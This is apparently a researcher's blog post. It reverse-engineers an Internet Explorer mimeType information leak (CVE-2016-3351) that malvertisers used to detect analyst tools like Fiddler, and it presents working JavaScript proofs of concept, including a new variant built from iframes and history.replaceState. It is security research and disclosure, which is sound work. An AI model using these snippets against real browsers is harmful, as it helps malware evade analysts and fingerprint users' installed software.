Detecting analysts before installing the malware (IE)

With the help of a beautiful piece of code, malware authors can detect installed applications straight from within the browser and serve the bad bits only to unsavvy users. In other words, attackers target regular users by detecting specific analysts’ applications (like Fiddler) and serving their harmful program only to users that do not have those apps installed. Essentially, their goal is to keep their malware under the radar for a longer period of time.

Today we are going to find a variation of CVE-2016-3351, which Microsoft patched last Tuesday. But before getting started, let me tell you that I couldn’t even have begun this without the continued help of Jérôme Segura from MalwareBytes. Later on I also received help from Kafeine, Brooks Li, and Joseph C Chen, either directly or through their impressive research on AdGholas. Finally, I’d like to thank Eric Lawrence and David Ross because without their constant help and support, blogging for me wouldn’t be possible.

Until last week, I had no idea of the details of the technique that follows. I knew like everyone else that AdGholas was evading analysts, but I had no idea how, and no free time to research it. I was still curious, but Brooks Li gently told me that he couldn’t share the PoC until Microsoft released the patch. So I simply forgot about this until last Tuesday, when I saw that my PC was updating. Ohh!! The mimeType bug! So I requested the PoC from Brooks and he told me that they had published the solution, right here. The article was impressive, but what caught my attention was the image below (yellow is mine).

Elegant Code

This is beautiful! How simple and elegant! Let’s convert it into something easier for our eyes:

var anchor = document.createElement("A");
anchor.href = ".saz";
alert(anchor.mimeType);
// Before the patch, alerts "Fiddler Session Archive" when Fiddler is installed

Fiddler Archive

Impressive! This returns Fiddler Session Archive, so attackers will quickly know if the user has Fiddler installed! Of course this can be done with other extensions and if you are curious, open the registry and navigate to Computer\HKEY_CLASSES_ROOT. There they are.

I was really amazed by the simplicity of the code, extremely beautiful even though it is malware, so I created a simple function based on it for easier testing. Of course that beauty will stop working after updating Windows, but who can deny its elegance anyway? Five minutes later my PC was updated and I was excited to see the same code failing after the patch. Predictably, it failed. It now returns “undefined” when we retrieve the mimeType property of an anchor element.
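That function isn’t reproduced here, but a minimal sketch of what such a test helper might look like follows. The names getFileTypeDescription and hasApplication are made up for illustration, and the document object is passed in as a parameter so the logic can also be exercised outside IE. Only the .saz / “Fiddler Session Archive” pair comes from the snippet above; any other extension and description would have to be looked up in the registry first.

```javascript
// Hypothetical helper (not the original PoC): read the file-type description
// that unpatched IE exposes through anchor.mimeType for a given extension.
function getFileTypeDescription(doc, extension) {
  var anchor = doc.createElement("a");
  anchor.href = "." + extension;
  return anchor.mimeType; // undefined once the patch is installed
}

// True when the description matches the one the application registers.
function hasApplication(doc, extension, expectedDescription) {
  return getFileTypeDescription(doc, extension) === expectedDescription;
}

// In unpatched IE one could try:
//   alert(hasApplication(document, "saz", "Fiddler Session Archive"));
```

Comparing against the expected description, instead of just checking for a non-empty value, avoids counting whatever generic text Windows might return for an extension nobody registered.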

Just as a quick preview of what’s coming, take a look at the before and after patch pictures. If it were the ad of a weight loss product we would be impressed by the change: the code has really been reduced! We don’t need to analyze anything at this point, just watch how the code was brutally trimmed. I prefer the elegance of the malware authors, even if it is malware. And by the way, attackers won’t get discouraged by this trim; they will instead try to find an alternative.

Bug patched: Finding an Alternative

So the patch is brutal but ideas start flowing. Why don’t we find an alternative route (aka variation) like real attackers do? It might be possible and worth a few minutes. So we need to get the unpatched code (from mshtml.dll in this case) and find which binary function gets hit when we access the anchor mimeType. Then, we need to find a way to call that same code using a different path.

The flow below shows what we guess before even disassembling mshtml. We know for sure that the yellow path exists, but we want to know if there are alternatives (red) to it. How can we do that? First, we should find the exact binary code that retrieves the mimeType, and then uncover other references to it. The red path is speculation, something that could or could not be there. But we will give it a try and get the answer pretty quickly.

There is a path from the JavaScript anchor.mimeType to a binary function (compiled code) that retrieves the mimeType. Our goal is to find the binary code that retrieves the mimeType and uncover every reference to it. The red paths show references that we suspect might exist, and even if this is just a guess, it’s worth our time because it can be done in a couple of minutes.

Path to mimeType

We will be using IDA Free for this task but there are many tools to achieve the same thing. In fact, once we get familiar with IE/Edge function names, we will go faster with a live debugger like WinDbg or even a quick disassembler like Hiew (with symbols). But today we will assume that IE is unknown territory for us and we don’t know anything about it.

Setup IDA Free

Note: I will be posting soon how to set up IDA Free with public symbols so you can do exactly as we do here. But in the meantime I pasted plain-text instructions here so you can get started!

Finding the Interesting Code

Let’s drop into IDA the binary that makes Internet Explorer tick: mshtml.dll. If you are not familiar with disassemblers, just follow as much as you can. This will be pretty basic and we can safely forget about opcodes today. Ready for the adventure? Remember: no assembly required, just a bit of mind-stretching.

First Goal: find the binary code that reveals the mimeType information.

We know that in JavaScript, anchor.mimeType retrieves the information that we want, so let’s go straight to the Strings Tab in IDA and search for “mimeType”. We want to see which code references it. The first two matches clearly have nothing to do with our goal: MSMimeTypesCollections, MSMimeTypesCollectionsPrototype. The third one is MimeType but we want one that starts with a lowercase m. The next two are MimeTypeArray and MimeTypeArrayPrototype, which again are not what we need. The next one seems to be what we are searching for! This is the first real match of “mimeType”.

mimeType String Found

Double clicking on that string takes us to the binary code tab (IDA-ViewA) which includes data references.

IDA Code View

IDA labels everything it can to help us with the analysis. In this case the “mimeType” string pointer was named aMimetype_2 as shown above (1). At the right (2) we can see the code that uses this string, but in order to see the complete list we should click on the label aMimetype_2 and press “X” so that a popup opens with every line of code referencing this string. How convenient! (We know there are more references because of the three dots (3) at the right.)

Now check out the popup below. We have three references and the middle one seems to be the one that we need. Don’t you think so? We first want to find which binary code is hit when we access anchor.mimeType, and the function names below make sense to me.

IDA References popUp

Remember, we are not trying to read opcodes here, just flowing with things that make sense according to the names that we know. There are more orthodox ways to achieve this but we are investing less than five minutes, just an educated guess.

Take a look at the names below. To me, the first one makes sense: CHTMLAnchorElement::Trampoline_Get_mimeType. True, the “Trampoline” part does not look familiar, but that does not prevent us from going on to see if we find what we need.

Code Step 1

Entering there (double click) takes us to a longer piece of code, but we shouldn’t lose our target: mimeType. Don’t read opcodes, just find “mimeType”.

CloseToMimeType

Even if confusing at first sight, if we do as we said and ignore the opcodes, it’s obvious which function we should follow, right? And if we double click on CAnchorElement::get_mimeType, we will end up in the code below.

Real call to code

Again a bit longer than we would like, but we have CHyperlink_get_href first and a few lines below GetFileTypeInfo. That rings a bell: first getting the href and then calling GetFileTypeInfo. I totally know this is speculation, but when we are analyzing regular code, educated guesses work most of the time. If we were reversing malware this would be harder; IE, however, does not play tricks on us. Let’s go to GetFileTypeInfo and see what we have there.

GetFileTypeInfo

We found our code! The call to SHGetFileInfoW seems pretty obvious to me, but we can always Google it and see what it does. This seems to be the code that retrieves the mimeType, but remember we are speculating here. Let’s see if this three-minute speculation pays some dividends.

Finding References (to discover alternative paths)

Click once at the top, over “GetFileTypeInfo” and press the “X” to display all references. Remember: we want to see if there are other ways to hit this code.

References that hit the code
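For readers without the screenshot, pressing “X” can be pictured as a reverse lookup on the call graph. As a rough illustration (this is not IDA output, and IDA does not expose its data in this form), the sketch below hardcodes only the caller/callee pairs named in this article and lists every function that references a given target. The calls table and the callersOf helper are invented for this example.

```javascript
// Caller -> callees, limited to the functions named in this article
// (unpatched mshtml.dll). Hand-written for illustration only.
var calls = {
  "CHTMLAnchorElement::Trampoline_Get_mimeType": ["CAnchorElement::get_mimeType"],
  "CAnchorElement::get_mimeType": ["CHyperlink_get_href", "GetFileTypeInfo"],
  "CDocument::get_mimeType": ["GetFileTypeInfo"],
  "CImgElement::get_mimeType": ["GetFileTypeInfo"],
  "GetFileTypeInfo": ["SHGetFileInfoW"]
};

// Reverse lookup: every function in the graph that references `target`.
function callersOf(graph, target) {
  var result = [];
  for (var caller in graph) {
    if (graph[caller].indexOf(target) !== -1) {
      result.push(caller);
    }
  }
  return result;
}

console.log(callersOf(calls, "GetFileTypeInfo"));
```

Any caller in that list other than the anchor one is a candidate alternative path.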

Trying JavaScript Code

Bingo! It seems that this code is hit twice by CDocument::get_mimeType, once by CImgElement::get_mimeType and, of course, by the one that we knew from the beginning, CAnchorElement::get_mimeType. CDocument looks like the document object to me and CImgElement seems to be the Image object or IMG HTML tag. Of course we are speculating, but what do we lose by going right now to the browser and testing document.mimeType and Image.mimeType? I didn’t even know (or remember) that those properties existed.

Hitting the code using an Image

Holy smokes, Batman! It worked! Let’s see what happens with the document object. Will this work?

Hitting with document.mimeType
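The screenshots are not reproduced here, so what follows is only a minimal sketch of that kind of quick console test, not the exact code that was run. The helper name readMimeTypes and its url parameter are placeholders, and what each property returns depends on the IE build and on what is installed, so no output is shown.

```javascript
// Hypothetical console helper: read mimeType from the three objects whose
// getters reference GetFileTypeInfo in the unpatched mshtml.dll.
function readMimeTypes(doc, url) {
  var anchor = doc.createElement("a");
  anchor.href = url;

  var img = doc.createElement("img");
  img.src = url;

  return {
    anchor: anchor.mimeType,
    image: img.mimeType,
    document: doc.mimeType
  };
}

// In IE's console one could try, for example:
//   readMimeTypes(document, "saz.saz");
```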

So now that we learned about these properties, we can complete the original flow, just like this:

We still don’t know if the anchorElement has other paths to the same code, but why bother? We are working with the unpatched binary and as we’ve seen at the beginning, the patched one has been seriously trimmed. In fact, a quick analysis reveals that anchorElement.mimeType and GetFileTypeInfo are not connected anymore. By “quick analysis” I mean pressing the “X” over the GetFileTypeInfo function inside IDA on the patched file. So, the updated flow really looks like this:

Playing with Code Alternatives

We know that the anchorElement is useless for our goal but the image and document objects have chances. Well, thinking for a moment, images can’t render things other than images, so it will be better to first try using the document object which is capable of rendering images, xml, html, and more. Also, if we are going to render different content-types in a document, better not to use the one where we run our script, right? If we do, our script will be unloaded by the new content. Let’s create an iframe and play with its document.

We try to render a .saz (Fiddler) file right inside the iframe.

var iframe = document.createElement("iframe");
iframe.src = "saz.saz";  // Load a saz file
document.body.appendChild(iframe);

Damn! IE tries to download the file and throws this warning!

IE Warning

Not acceptable. Attackers are very cautious with these things. They will get caught immediately with code like that. And in any case, it does not work: when we try to get the document.mimeType of that iframe, it returns “Chrome HTML Document”. We need to change the URL of that iframe without warnings and fool IE into thinking that a saz file has been rendered. We will set the location of the iframe without really changing the content of the document. This can be done with history.pushState or history.replaceState. Let’s continue with the same iframe.

iframe.contentWindow.history.pushState("","","saz.saz");
alert(iframe.contentDocument.mimeType);

pushstatemimetype

It seems that we have it, right? Wrong! We’ve been lucky because the saz file was previously downloaded and cached, although not rendered because it has a saz extension. When IE requests data from a URL, it first tries to guess its content type using different mechanisms, and the last of them is the file extension. In this case we are not even retrieving a valid saz file: the web server responded with a default HTTP Status Code 200 and the default Content-Type: application/octet-stream, and IE ended up guessing that it’s a Fiddler file because of its extension. However, it needed to download the file first.

Building a working Proof of Concept

So what can we do to download the file in advance without warnings? Well, there are a zillion ways, but let’s use the most primitive one which was used in the past to cache roll-over images: the Image object. Let’s build a proof of concept but this time caching the saz in advance and using replaceState instead of pushState (it’s cleaner and doesn’t add URLs in the history object).

var img = new Image();
img.src = "saz.saz"; // HTTP 200, any length and content-type

// The saz is precached. Let's create the iframe.
var iframe = document.createElement("iframe");

// Load anything inside it because about:blank does not work with replaceState.
iframe.src = "/favicon.ico";
document.body.appendChild(iframe);

// Set the location of the iframe to the saz file
iframe.contentWindow.history.replaceState("", "", img.src);

// Bingo!
alert(iframe.contentDocument.mimeType);
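
The snippet above runs every step back to back. As a variation (an assumption, not part of the original PoC), the sketch below waits for the precaching request and for the iframe to finish loading before calling replaceState. The function name detectByExtension, its parameters, and the callback are hypothetical; win is the window object, passed in so the logic can be exercised with stand-ins.

```javascript
// Hypothetical load-aware variant of the PoC above.
// win:            the window object (or a stand-in with Image and document)
// fileUrl:        URL ending in the extension to probe, e.g. "saz.saz"
// placeholderUrl: anything loadable in the iframe, e.g. "/favicon.ico"
// callback:       receives the mimeType reported by the iframe's document
function detectByExtension(win, fileUrl, placeholderUrl, callback) {
  var doc = win.document;
  var img = new win.Image();

  function afterPrecache() {
    var iframe = doc.createElement("iframe");
    iframe.onload = function () {
      // Change the iframe's URL without navigating or replacing its content.
      iframe.contentWindow.history.replaceState("", "", img.src);
      callback(iframe.contentDocument.mimeType);
    };
    iframe.src = placeholderUrl;
    doc.body.appendChild(iframe);
  }

  // A saz file is not an image, so the request is expected to end in onerror.
  img.onload = afterPrecache;
  img.onerror = afterPrecache;
  img.src = fileUrl; // starts the precaching request
}

// In IE one could try:
//   detectByExtension(window, "saz.saz", "/favicon.ico", alert);
```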

Update: variation patched on 2016-11-08.

[ Test it Live on IE ] [ Download the Files ]

If you are a Linux user, just watch the video below:

Have a nice day, fellow bug hunter! If you have questions please ping me at magicmac2000.